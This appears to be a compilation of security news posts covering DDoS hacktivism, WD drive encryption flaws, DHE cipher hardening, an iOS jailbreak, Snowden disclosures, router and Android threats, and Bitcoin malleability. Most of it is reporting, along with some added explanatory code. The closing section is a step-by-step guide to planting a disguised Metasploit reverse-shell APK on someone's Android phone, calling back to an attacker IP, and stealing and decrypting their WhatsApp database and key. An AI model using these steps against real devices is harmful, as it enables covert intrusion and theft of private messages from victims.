Anonymous Hacker Group Performed DDoS Attack On Two Japanese Airports



Anonymous has attacked two Japanese airports in protest over the country's practice of dolphin hunting.
On the 10th of October, Narita and Chubu airports in the east of the country were both subject to DDoS attacks on their websites by the hacktivist group Anonymous, as part of its campaign against dolphin hunting, a practice that, though controversial, is still legal in Japan.
While airport authorities claimed that flights were unaffected at either of the airports, Narita airport's website was shut down for eight hours. Anonymous later took credit for the attack over Twitter.

Earlier this year, the website of Taiji, a town in south-eastern Japan known for its dolphin hunting, was shut down in what police suspect was an attack by Anonymous. There have also been recent DDoS attacks on the Japan National Tourism Organisation and Japan's Fishermen's Union.
Japan has attracted the ire of animal rights activists and pressure groups around the world, particularly for drive hunting (a pod of dolphins is harassed to confuse and corral them, then they are caught and killed quickly by driving a metal pin into their necks).
The hacktivist group hinted at the attack the day before it was carried out. The group tweeted that it was going to perform attacks on two major Japanese airports, according to police. The hashtag #opkillingbay has spread over Twitter to popularise the cause of the diffuse hacktivist group.
The DDoS attack is a long-time favorite weapon in the hacktivist's arsenal. This kind of attack paralyses targeted websites by flooding them with overwhelming amounts of traffic from many different networks, effectively shutting them down.
Caroline Baylon, editor of the Journal of Cyber Policy and Chatham House's expert on all things cyber, noted to SC that “When it comes to DDoS attacks, these are basic but highly effective attacks that hacker groups use to take down websites on a regular basis.” She went on to point to recent cases of the hacker group GhostSec performing DDoS attacks on Islamic State websites in the wake of the Charlie Hebdo massacre of January 2015.
Attacks of this kind are not rare, but they aren't often seen performed on a large public institution like an airport. The same can be said for Anonymous, which tends to target private organisations like Koch industries, or most famously, the Church of Scientology.
“Hacktivism, or rather the use of DDoS being attributed to hacktivist groups is not particularly new,” says Raj Samani, CTO of Intel Security. He spoke to SC, saying that: “One of the challenges of course is to determine whether specific attacks are indeed conducted by such well-known groups, or used as a potential smokescreen.”
Anonymous' most recent operation of note was #OpBEAST, a campaign against fetish sites that specialised in bestiality, culminating in the successful shutting down of the world's most popular bestiality forum, beastforum.com and the defacing of several others.

Flaws In Western Digital self-encrypting external hard disk drives could expose user data

Security researchers Gunnar Alendal, Christian Kison and modg examined how WD self-encrypting external hard disks work and discovered design flaws that allowed them to decrypt the data without the user's password. The researchers also found that the flaws allow the user password to be recovered with a brute-force attack.
The design flaws the researchers found depend on which microchip performs the encryption of the user's data.
In some cases, the researchers found that the encryption is performed by the chip that bridges the USB and SATA interfaces. In other cases the encryption is done by the HDD's own SATA controller, with the USB bridge handling only the password validation.
The researchers examined WD external drive models with six different USB bridges from JMicron Technology, Symwave, Initio and PLX Technology. Because the setup differs between chips, the security issues they discovered varied from device to device according to the implementation, the researchers said in a recently released paper.

How WD Encryption Works

The way encryption works in these drives is that a user-selected password is used to create a key encryption key (KEK). This is a cryptographic hash of the password generated with the SHA256 function.
The KEK is then used to encrypt a separately generated data encryption key (DEK). This encrypted version of the DEK, known as the eDEK, is stored in the USB bridge's EEPROM, in a hidden sector on the hard disk itself or in a special disk region called the service area.
The eDEK is decrypted when the user inputs the correct password in the drive's software that runs on the host computer and the resulting DEK is then used by the chip to perform the encryption and decryption operations on the fly.

Here's the Flaw

For four of the tested USB bridges the researchers found methods of extracting the eDEK, allowing for offline brute-force attacks to guess the KEK and subsequently recover the DEK.
According to the researchers, all WD drives use a hardcoded salt (a string that is combined with the user-supplied password before hashing, to make the result harder to precompute) and a fixed iteration count for the hashing itself.
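To make the password-to-KEK-to-eDEK chain described above concrete, here is an added Python example; it is not the researchers' code or WD's firmware. The salt bytes, the iteration count, the exact way SHA-256 is chained and the SHA-256-keystream XOR standing in for a real key wrap are all assumptions, chosen only so that the effect of a hardcoded salt can be observed: two drives protected by the same password end up with the same KEK, so a single KEK precomputed from a password list applies to both, whereas a random per-device salt fed to PBKDF2 gives each drive a different KEK.

```python
import hashlib
import os
from typing import Optional

# Assumptions: these stand in for the vendor's hardcoded salt and fixed
# iteration count, whose real values the article does not give.
HARDCODED_SALT = b"constructed-fixed-salt"
FIXED_ITERATIONS = 1000


def derive_kek_fixed(password: bytes) -> bytes:
    """KEK as a SHA-256 hash of the password, iterated a fixed number of times
    with the same salt on every drive (the design the article describes).
    The exact chaining is an assumption; what matters is that every input
    is identical for every drive that shares the password."""
    digest = password + HARDCODED_SALT
    for _ in range(FIXED_ITERATIONS):
        digest = hashlib.sha256(digest).digest()
    return digest


def derive_kek_salted(password: bytes, device_salt: bytes, iterations: int = 200_000) -> bytes:
    """Hardened alternative: PBKDF2-HMAC-SHA256 with a random per-device salt.
    The same password now yields a different KEK on every drive."""
    return hashlib.pbkdf2_hmac("sha256", password, device_salt, iterations)


def _keystream(kek: bytes, length: int) -> bytes:
    """Toy key-wrap keystream (SHA-256 in counter mode). A real bridge would use
    AES; this keeps the example standard-library only."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(kek + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def wrap_dek(kek: bytes, dek: bytes) -> bytes:
    """eDEK = DEK XOR keystream(KEK); this is what sits in the EEPROM,
    hidden sector or service area. XOR makes unwrap the same operation."""
    return bytes(a ^ b for a, b in zip(dek, _keystream(kek, len(dek))))


unwrap_dek = wrap_dek


def provision_drive(password: bytes, device_salt: Optional[bytes] = None):
    """Simulate drive setup: generate a random DEK, derive the KEK from the
    password (fixed design when device_salt is None, per-device PBKDF2
    otherwise) and wrap the DEK. Returns (kek, edek, dek) so the demo can
    inspect them; a real drive only ever exposes the eDEK."""
    dek = os.urandom(32)
    if device_salt is None:
        kek = derive_kek_fixed(password)
    else:
        kek = derive_kek_salted(password, device_salt)
    return kek, wrap_dek(kek, dek), dek


def keks_collide(password: bytes, salt_a: Optional[bytes] = None,
                 salt_b: Optional[bytes] = None) -> bool:
    """Do two drives protected by the same password end up with the same KEK?
    True means one precomputed KEK unlocks the eDEK of every such drive."""
    kek_a, _, _ = provision_drive(password, salt_a)
    kek_b, _, _ = provision_drive(password, salt_b)
    return kek_a == kek_b


if __name__ == "__main__":
    print("fixed salt, same password, two drives share a KEK:", keks_collide(b"correct horse"))
    print("per-device salt, same password, two drives share a KEK:",
          keks_collide(b"correct horse", os.urandom(16), os.urandom(16)))
```

The design point is that the salt and iteration count are public in both designs; what the per-device salt changes is that the attacker's work no longer amortises across drives, and the higher PBKDF2 iteration count makes each guess cost more.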

Attackers could use large collections of common passwords to pre-compute the corresponding KEKs. These could then be used to try to decrypt the extracted eDEKs and ultimately the data stored on the drives. In some cases an attacker does not even need brute force or password guessing to decrypt the data, because the researchers also found authentication flaws in the WD external hard drives that gave them backdoor access to the encrypted data.
Of the six chips, one stores the KEK in plain text in its EEPROM, making its recovery easy. In another chip, the KEK is stored in encrypted form, but it is encrypted with a hardcoded key that can also be extracted. For a third chip the KEK can be extracted from RAM using a vendor-specific command.
For one JMicron chip, the researchers managed to use a commercial data recovery tool to delete some bits from a drive's service area, completely unlocking the drive's data. This compromises the encryption without the need to recover any password or KEK.
The firmware update process on the tested hard drives does not use cryptographic signature verification and can therefore be hijacked. This could allow attackers to implant malware inside the firmware to infect host computers or to add cryptographic backdoors. There is no easy way to recover from such firmware modifications, the researchers said.

How to Remain Secure Against The NSA Data Decryption Attack.

Researchers Alex Halderman and Nadia Heninger presented research showing how the NSA exploits flaws to decrypt huge amounts of communications instead of securing the Internet. The NSA can decrypt a huge amount of HTTPS, SSH, and VPN connections that use the Diffie-Hellman key exchange with 1024-bit primes. Halderman and Heninger were also part of the research group that published a study of the Logjam attack, which took advantage of neglected and obsolete code to impose downgraded, 512-bit parameters for Diffie-Hellman.
While major browsers such as Internet Explorer, Chrome, and Firefox have already removed support for 512-bit Diffie-Hellman, 1024-bit Diffie-Hellman is still supported despite being vulnerable to NSA surveillance.
Here are some tips on how to protect yourself from the NSA data decryption attacks.

Web Browser

Always have a look at the encryption algorithms and make sure you're using the strongest crypto that your browser supports. There's an excellent tool, How's My SSL?, that will test your browser's cipher suite support. The relevant area of the page is at the bottom, "Given Cipher Suites". You want to make sure that you don't see the text "_DHE_" in the list of cipher suites, although the Elliptic Curve variant of Diffie-Hellman, represented by suites with "_ECDHE_", is okay. It is important to note that there is a trade-off here: removing your client's support for "_DHE_" ciphers will eliminate the risk of this attack, but it may also remove Forward Secrecy support altogether for some sites. Here's how to remove those "_DHE_" cipher suites if you still have them:

Firefox

(tested with 40.0.3)
Open a new tab, enter "about:config" into the location bar and hit the "Enter" key. If you get a warning page, click "I'll be careful, I promise!" This will bring you to the Firefox configuration settings. In the search bar up top, type ".dhe_" and hit the "Enter" key. This should result in two settings being displayed: "security.ssl3.dhe_rsa_aes_128_sha" and "security.ssl3.dhe_rsa_aes_256_sha". Double-click both of them to change the value from "true" to "false".
Now, if you refresh the How's My SSL page, the "_DHE_" ciphersuites should be gone!

Chrome

After following the steps below for your operating system, refresh the How's My SSL page; the "_DHE_" cipher suites should be gone. Note that the hex values in the blacklist correspond to entries in the TLS Cipher Suite Registry.

OSX

(tested with 46.0.2490.71, OSX 10.10.5)
Open "automator" and double-click "Run Shell Script". Replace the "cat" command with the following:
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15
Save the application to your applications folder with whatever filename you like. In finder, you can drag the application to your dock and use that to launch Chrome without the vulnerable ciphers.

Windows

(tested with 46.0.2490.71, Windows 7)
Right-click the shortcut to your Chrome application, click "properties" and then add the following to the end of the "target": "--cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15"
The target then should be similar to the following:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15
From now on, open Chrome from this shortcut.

Linux

(tested with 46.0.2490.13, Ubuntu 14.04 LTS)
Starting chrome from the command line with the following flag removes the undesired ciphers:
google-chrome --cipher-suite-blacklist=0x0033,0x0039,0x009E,0xcc15
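The check the How's My SSL page performs can also be done locally. Here is an added Python example (not the How's My SSL tool and not browser code) that builds a client TLS context with finite-field DHE suites excluded via an OpenSSL cipher string, lists what that client would offer, and classifies suite names in either IANA form (TLS_DHE_RSA_...) or OpenSSL form (DHE-RSA-...). The mapping of the four hex IDs from the Chrome blacklist above to suite names follows the TLS Cipher Suite Registry (0xCC15 being the pre-RFC draft ChaCha20 identifier Chrome used at the time); the cipher string itself is a suggested configuration, an assumption of this example rather than something the article prescribes.

```python
import ssl

# Chrome's --cipher-suite-blacklist takes IANA suite identifiers. These four
# are the ones in the flag above, resolved against the TLS Cipher Suite
# Registry; 0xCC15 is the draft (pre-RFC 7905) DHE_RSA ChaCha20 identifier.
CHROME_BLACKLIST_IDS = {
    0x0033: "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    0x0039: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    0x009E: "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    0xCC15: "TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
}


def is_classic_dhe(suite_name: str) -> bool:
    """True for finite-field Diffie-Hellman suites (the "_DHE_" entries the
    article says to avoid); elliptic-curve ECDHE suites are not flagged.
    Works for IANA names (TLS_DHE_RSA_...) and OpenSSL names (DHE-RSA-...)."""
    upper = suite_name.upper()
    return "DHE" in upper and "ECDHE" not in upper


def classic_dhe_suites(suite_names):
    """Filter a list such as the 'Given Cipher Suites' block from How's My SSL."""
    return [name for name in suite_names if is_classic_dhe(name)]


def dhe_free_client_context() -> ssl.SSLContext:
    """Client context that keeps ECDHE (elliptic-curve forward secrecy) and
    drops finite-field DHE. The cipher string is this example's suggestion."""
    ctx = ssl.create_default_context()
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:ECDHE+AES:!DHE:!aNULL:!eNULL:!MD5")
    return ctx


def offered_cipher_names(ctx: ssl.SSLContext):
    """Names of the suites this context would offer in a ClientHello."""
    return [cipher["name"] for cipher in ctx.get_ciphers()]


# Constructed sample of what a browser report might contain, mixing ECDHE,
# finite-field DHE and plain RSA key exchange.
SAMPLE_REPORTED_SUITES = [
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    "TLS_RSA_WITH_AES_128_CBC_SHA",
]


if __name__ == "__main__":
    print("flagged in sample report:", classic_dhe_suites(SAMPLE_REPORTED_SUITES))
    hardened = offered_cipher_names(dhe_free_client_context())
    print("suites the hardened client offers:", hardened)
    print("DHE suites left in hardened client:", classic_dhe_suites(hardened))
```

The same trade-off the article mentions applies here: a context built this way cannot negotiate forward secrecy with a server that only offers finite-field DHE, so it falls back to whatever non-DHE suites remain in the list.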

SSH

An excellent guide for hardening your SSH configuration was released after revelations that the NSA can sometimes decrypt SSH connections. The guide is available here.

VPN

OpenVPN

Most VPN software supports the ".ovpn" file extension used by OpenVPN. Many VPN providers will also provide ".ovpn" files to connect using OpenVPN. You can query your OpenVPN client for the ciphers it supports with the following command:
openvpn --show-tls
This list should be ordered with the strongest ciphers first. Recent versions of OpenVPN will have "ECDHE" support, but in order to connect, your VPN provider has to support the desired cipher as well. Ciphers with just "DHE" can be vulnerable; however, OpenVPN often has VPN servers generate their own primes, which mitigates the risk of the precomputation attack. Edit your ".ovpn" file with a line containing the strongest ciphers and test it against your VPN provider to see if it connects properly:
tls-cipher [cipher-1]:[cipher-2]:[cipher-3]
If it does not connect with strong ciphers, contact your VPN provider and request they update their servers to support the strongest ciphers available.

A Man With An Online Army Of More Than 13000 Infected Computers Arrested


A hacker named Sergey Vovnenko has been arrested for computer intrusions including credential theft, credit card theft and wire fraud, among others. Apart from that, he operated a botnet of more than 13,000 infected computers.

He was an administrator of the criminal hacking forums "Botnet And Elite". In other hacking communities he was also known by the names “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,” “Stranier,” and “Darklife.”
According to a statement from the U.S. Attorney’s Office, Vovnenko faces various charges, which include wire fraud conspiracy, unauthorized computer access, and aggravated identity theft.

He has been extradited from Italy to face hacking charges in a New Jersey court. The U.S. Secret Service had been tracking Vovnenko for a long time, and finally, in coordination with Italian law enforcement agencies, he was arrested last June in Naples while trying to steal credit card accounts. Italian law enforcement agencies investigated him during this time and finally handed Sergey Vovnenko over to U.S. authorities to face criminal charges in a New Jersey court.

Vovnenko may face up to 30 years in prison for wire fraud conspiracy and may also have to pay up to $1.5M in fines for his crimes of unauthorized computer access, aggravated identity theft and wire fraud conspiracy.

How To Jailbreak iOS 9 Using Pangu.


Woooo! Good news, jailbreakers: the moment we have all been waiting for has come. Yes, the iOS 9 jailbreak has finally been released by the Pangu Team today.

The Pangu Jailbreak Tool works for iOS 9.0-9.0.2.

The Pangu Team Tweeted Today,
"We are very excited to announce the release of Pangu 9, the first untethered jailbreak tool for iOS 9 (http://pangu.io )."

Note: The Pangu Jailbreak Tool for iOS 9 is for Windows only. But of course you can run Windows in a virtual machine and jailbreak your device on a Mac.
This jailbreak tool supports all devices running iOS 9.

Before jailbreaking, make sure to back up your device.

Step 1: Connect your iOS 9 device to your computer via USB.

Step 2: Disable Find My iPhone.

Step 3: Disable Passcode and Touch ID.

Step 4: Enable Airplane mode.

Step 5: Download the Pangu jailbreak tool for iOS 9.

Step 6: Now run the Pangu Jailbreak Tool.

Step 7: Start the Pangu jailbreak by clicking the Start button and click Already Backup when prompted.

Step 8: Your iPhone will reboot and Pangu will ask you to put your iPhone back into Airplane mode. Once you have done that, it will continue the jailbreak process.

Step 9: Then the Pangu tool will request that you open the Pangu app on the iPhone’s Home screen.

Step 10: Once the Pangu app is running, it will ask you to allow access to your Photo Library. Tap the accept button on the Pangu screen to continue. Tap the OK button on the “Pangu Would Like to Access Your Photos” pop-up box.

Step 11: Now your iPhone will reboot once again. Once it has rebooted, disable Airplane mode and run the Cydia app.

That's it, now you have successfully jailbroken your iOS 9 device.

Microsoft helped the NSA to decrypt the encryption of "Outlook.com Web chat, Hotmail service, and Skype".



Microsoft worked hand-in-hand with the United States government in order to allow federal investigators to bypass encryption mechanisms meant to protect the privacy of millions of users, Edward Snowden told The Guardian.

According to an article published on Thursday by the British newspaper, internal National Security Agency memos show that Microsoft actually helped the federal government find a way to decrypt messages sent over select platforms, including Outlook.com Web chat, Hotmail email service, and Skype.

The documents, which are reportedly marked top-secret, come in the wake of other high-profile disclosures attributed to Snowden since he first started collaborating with the paper for articles published beginning June 6. The United States government has since indicted Snowden under the Espionage Act, and he has requested asylum from no fewer than 20 foreign nations.

“The latest NSA revelations further expose the tensions between Silicon Valley and the Obama administration,” the journalists wrote. “All the major tech firms are lobbying the government to allow them to disclose more fully the extent and nature of their cooperation with the NSA to meet their customers' privacy concerns. Privately, tech executives are at pains to distance themselves from claims of collaboration and teamwork given by the NSA documents, and insist the process is driven by legal compulsion.”

In the case of Microsoft, however, it appears as if the Bill Gates-founded tech company went out of its way to assist federal investigators.

Just say no to Facebook's Free Internet Service "Internet.org", says inventor of "World Wide Web"


‘Just Say No’ To Internet.org, says Tim Berners-Lee, founder of World Wide Web

Attacking Facebook’s initiative known as Free Basics (formerly Internet.org), the English scientist Tim Berners-Lee, widely known as the inventor of the World Wide Web, said that consumers should say no to such initiatives. The initiative by Facebook aims at offering a limited set of websites and apps free of charge to users in developing countries. Berners-Lee added that if something is being offered in the name of the Internet that is not the full Internet, then it’s not really free and public.
In an interview with The Guardian, Berners-Lee said people in prominent markets should “just say no” to the project. Speaking about the importance of privacy and the dangers of government snooping, he added that the initiative was not internet and that there were other ways of reducing the price of access.
“When it comes to compromising on net neutrality, I tend to say ‘just say no’,” he said.
According to the reports by The Guardian, Berners-Lee and the Web We Want festival came together to produce a Magna Carta for the 21st century on the 800th anniversary of the signing of Magna Carta. The Web We Want campaign is promoting five key principles for the future of the Web: freedom of expression online and offline, protection of user data and privacy, affordable access to the net, net neutrality, and a decentralised and open infrastructure.
“In the particular case of somebody who’s offering … something which is branded internet, it’s not internet, then you just say no. No it isn’t free, no it isn’t in the public domain, there are other ways of reducing the price of internet connectivity and giving something … (only) giving people data connectivity to part of the network deliberately, I think is a step backwards.”

Vulnerability In Netgear Router Allows Attacker To Gain Access To "Admin Page Without Credentials"

Shellshock Labs researchers identified a vulnerability in Netgear routers that allowed them to access the router's admin page without entering credentials.

The researchers discovered the vulnerability in the Netgear router firmware versions N300_1.1.0.31_1.0.1.img and N300-1.1.0.28_1.0.1.img.

The vulnerability allows an attacker to gain complete access to the admin page and settings. An attacker could then:

  • Perform a man-in-the-middle attack
  • Manipulate browser requests
  • Reconfigure DNS settings
  • Redirect traffic
  • Even downgrade SSL to intercept and monitor HTTPS traffic

Here's how the attack works

The attacker can easily exploit the router by reaching the web management interface, which is accessible by default from the internal network. If remote administration is enabled, the attacker only has to be connected to the Internet. After initially failing to authenticate against the router, they call a particular URL numerous times; eventually they gain access to the administration interface without being prompted for credentials.

This vulnerability had already been reported to Netgear by Daniel Haake of Compass in July. According to Haake, the vulnerability was reported to Netgear by email and chat. On Sept. 3, almost a month later, Netgear sent Haake a beta firmware to determine whether the issue had been patched adequately, but before Netgear had released the patch publicly, Shellshock Labs disclosed the vulnerability on Sept. 29.
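The pattern the article describes, a failed login followed by the same URL being requested many times until the interface answers without credentials, is visible in access logs. Here is an added Python example of detection logic for that pattern; it is not Netgear's or Shellshock Labs' code. The log format, the path /admin_page, the source addresses and the repeat threshold are all constructed placeholders, since the page gives none of them.

```python
import re
from collections import defaultdict

# Constructed log format: <src> [<time>] "<METHOD> <path>" <status>
# Neither this format nor the /admin_page path is Netgear's; both are placeholders.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3})$'
)


def parse_line(line: str):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_retry_until_access(lines, min_repeats: int = 10):
    """Flag (src, path) pairs where a 401 is followed by at least min_repeats
    further 401s on the same path and then a 200 on that path. A user who
    mistypes a password once and then logs in normally is not flagged."""
    state = defaultdict(lambda: {"failed": False, "repeats": 0})
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the detector
        key = (rec["src"], rec["path"])
        st = state[key]
        if rec["status"] == 401:
            if st["failed"]:
                st["repeats"] += 1
            else:
                st["failed"], st["repeats"] = True, 0
        elif rec["status"] == 200 and st["failed"]:
            if st["repeats"] >= min_repeats:
                findings.append({
                    "src": rec["src"],
                    "path": rec["path"],
                    "repeats": st["repeats"],
                    "granted_at": rec["ts"],
                })
            # access was granted (legitimately or not); start fresh for this pair
            state[key] = {"failed": False, "repeats": 0}
    return findings


def build_sample_log():
    """Constructed sample: one benign user, one source hammering the same URL,
    plus unrelated traffic and a malformed line."""
    benign = [
        '10.0.0.5 [12:00:01] "GET /admin_page" 401',
        '10.0.0.5 [12:00:09] "GET /admin_page" 200',
    ]
    hammer = [f'203.0.113.9 [12:01:{i:02d}] "GET /admin_page" 401' for i in range(25)]
    hammer.append('203.0.113.9 [12:01:25] "GET /admin_page" 200')
    noise = [
        '198.51.100.7 [12:02:00] "GET /index.html" 200',
        'garbage line that does not match the format',
    ]
    return benign + hammer + noise


if __name__ == "__main__":
    for finding in find_retry_until_access(build_sample_log()):
        print(finding)
```

The threshold is deliberately a parameter: on a home router a handful of failed logins from one address is normal, while dozens against one path that end in a 200 deserve a look, and the same logic works on any web front end that logs source, path and status.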

ESET Disclosed Fake Android Apps That Bypass Google Play Store Security Check




ESET has uncovered fake apps available on the official Google Play store. Posing as trendy game cheats, such as Cheats for Pou, Guide for SubWay and Cheats for SubWay, these fake apps were installed more than 200,000 times in a single month, according to ESET security researchers.

The apps deliberately show adverts every 30-40 minutes, disrupting normal use of the users’ Android devices.

The fake apps, detected as Android/AdDisplay.Cheastom, deploy various techniques to evade detection by Google Bouncer, the technology Google uses to stop malicious apps from getting into the Google Play store. Additionally, the apps contain self-preservation code to make their removal difficult.

“These aggressive ad-displaying apps plan to hide their capability from security analysts by deploying techniques that succeeded in being downloaded over 200K times during a single month,” said Lukas Stefanko, malware analyst at ESET.

“The anti-Bouncer technique utilized by these apps obtains the IP address of the device and accesses its WHOIS record. If the data that comes back contains the string ‘Google’, then the app assumes it's running in Bouncer. When the app detects an emulator or a Google Bouncer setting, the ads are not displayed. Instead, the app will merely give game cheats, obviously.”

ESET notified Google and these unwanted applications have now been removed from the Google Play store.

“Although it’s great that Google removed the apps from the Android Google Play store when we enlightened them about the problem, it's clear that a lot of attempts are going to be made to bypass Google Bouncer and spread apps containing undesirable code,” said Stefanko.

Bitcoin Transactions Were Under Attack for a Week


Transactions were being duplicated in a malleability attack

A Russian man who calls himself "Alister Maclin" has been disrupting the Bitcoin network for over a week, creating duplicate transactions and annoying users.
The attack was first noticed by Coinkite, a high-tech Bitcoin platform, and was eventually claimed by Maclin on one of the Bitcoin forums.
According to Bitcoin experts, the attack was not dangerous and is the equivalent of "spam" on the Bitcoin blockchain servers, known in the industry as a "malleability attack."

A malleability attack on the Bitcoin network duplicates transactions

What happens is that when User A sends a transaction to User B, an attacker could intercept the Bitcoin payment and alter its ID (from 0001 to 0002).
When the transaction reaches the Bitcoin blockchain, the technology that registers and logs the payment, it is recorded with both IDs, causing a serious delay in showing the payment as confirmed (which usually takes 10 minutes).
Only the transaction ID is affected by a malleability attack; the sender, recipient, and the Bitcoin sum are left intact. All transactions are processed by the Bitcoin blockchain, funds are transferred only once, and eventually one of the duplicate transaction IDs gets invalidated, confirming the other transaction.
Affected users usually just get annoyed, in the least serious cases, but some will also resend their transaction after not receiving the normal confirmation, spending double the amount that was needed.

The attacker was only performing a "stress test"

In an interview with Vice, Maclin said that he was only performing a stress test on the Bitcoin network, by intercepting transactions and rebroadcasting them with a different ID. Maclin said he has stopped for the moment, but he plans further tests in the upcoming weeks.
This attack type is well known in Bitcoin circles, and a fix has been in development for almost a year. Coinkite describes the attack as "a simple numeric tweak to one number (S) in the ECDSA signature [used to authenticate Bitcoin transactions]. It’s documented as part of BIP62 and is called the 'low S' requirement. Coinkite always uses the lower S value, but these pranksters have been replacing that with the higher S value."

You Paid For Your Smartphone But Whoever Controls The Software "Owns The Phone"



British spies can hack into your smartphone remotely with just a simple text message and can make audio recordings, take pictures or record video without the owner knowing, former US intelligence contractor Edward Snowden said on Monday.

No matter who owns the phone, the power to control it is in their hands. "They want to own your phone instead of you," Snowden said in an interview with the BBC's Panorama programme, referring to Britain's Government Communications Headquarters (GCHQ) agency.

Snowden also said that GCHQ used many different interception tools, such as the "Smurf Suite", named after the blue cartoon characters, The Smurfs.
"Nosey Smurf" enabled spies to switch on a smartphone's microphone even if the phone was off, he claimed.

Some other programmes used by GCHQ were named as "Tracker Smurf" and "Dreamy Smurf", which allows them to switch on and off your smartphones remotely, Snowden said.
He said the text message sent by GCHQ to gain access to the phone would not be noticed by its owner. It all works in the background of your smartphone as a backdoor service.

"It's called an 'exploit'," he said.
"When it arrives at your phone it's hidden from you. It's invisible it doesn't display. You paid for your phone but whoever controls the software owns the phone," he added.

The government had declined to comment in line with usual policy on intelligence matters, the BBC said.
After leaking documents to the media about the government spy programme, Edward Snowden, who has been charged by the US with espionage and theft of government property, has been living in exile in Russia since June 2013.

The British Government and its security agencies are planning to introduce a new law that would give intelligence agencies more powers to track online activity in order to investigate crime.

How To Remotely Decrypt The Whatsapp Database "crypt8"

Before starting the database decryption process,first obtain remote access to android device:

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk

[ Lhost=Attacker IP address, Lport=local port ]
This command will generate fake.apk in home directory.

2. Type: msfconsole
This command will start the metasploit framework.

3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.

4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.

5. Type: show options
It will show the available options like lhost,lport

6. Set LHOST=192.168.0.2

7. Set LPORT=81

8. EXPLOIT


Now run the app created in step 1 on your Android phone and you'll get a meterpreter session.


After getting the meterpreter session type below command to download the file:
  • cd /
  • cd /sdcard/WhatsApp
  • ls (list the current directory)
  • cd Databases
  • download msgstore.db.crypt8 (This will take time, maybe a LOT)
So, the database has been downloaded; now we need the key to decrypt the database.
Follow the commands below to obtain the key for the databases:
  • cd /
  • cd /data/data
  • ls
  • cd com.whatsapp
  • ls
  • cd files
  • ls
  • cp key /sdcard/Download
(This copies the file 'key' to the sdcard > Download folder.)

After obtaining the database and key, download the simple GitHub tool to decrypt the database:
  • Open the application (in Windows).
  • Click 'File', then 'Decrypt .crypt8'.
  • In the box, provide the key file and the database.
  • Click OK; you will see that a 'msgstore.decrypted' file has appeared on your desktop.

  • Open it using the same application: go to 'File', then 'Open'.
  • Provide the decrypted file generated on the desktop, and leave the account name and the 'wa.db' fields blank.
  • Click 'OK'.
  • Now you will see the contact numbers with the chat details.
Note: A rooted smartphone is required to obtain the database and key from the phone.